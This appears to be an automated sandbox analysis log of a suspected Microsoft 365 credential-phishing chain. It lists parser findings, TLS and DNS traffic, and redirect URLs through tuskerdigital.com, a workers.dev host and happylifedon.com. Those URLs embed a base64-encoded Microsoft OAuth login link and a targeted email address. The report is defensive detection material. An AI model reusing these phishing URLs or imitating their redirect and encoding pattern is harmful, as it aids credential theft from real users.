            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No favicon
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No favicon
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No favicon
            Source: https://outlook.office365.com/owa/prefetch.aspxHTTP Parser: No favicon
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No favicon
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://login.live.com/HTTP Parser: No <meta name="author".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://login.live.com/HTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:60115 version: TLS 1.2
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60130 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60130 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60113 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.16:60130 -> 1.1.1.1:53
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: global trafficHTTP traffic detected: GET /winner/24968//dHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ== HTTP/1.1Host: tuskerdigital.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tuskerdigital.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://tuskerdigital.com/winner/24968//dHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: m.exactag.com
            Source: global trafficDNS traffic detected: DNS query: tuskerdigital.com
            Source: global trafficDNS traffic detected: DNS query: 74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: doitace.com
            Source: global trafficDNS traffic detected: DNS query: happylifedon.com
            Source: global trafficDNS traffic detected: DNS query: juliodown.com
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: outlook.office365.com
            Source: global trafficDNS traffic detected: DNS query: r4.res.office365.com
            Source: global trafficDNS traffic detected: DNS query: logincdn.msftauth.net
            Source: global trafficDNS traffic detected: DNS query: acctcdn.msftauth.net
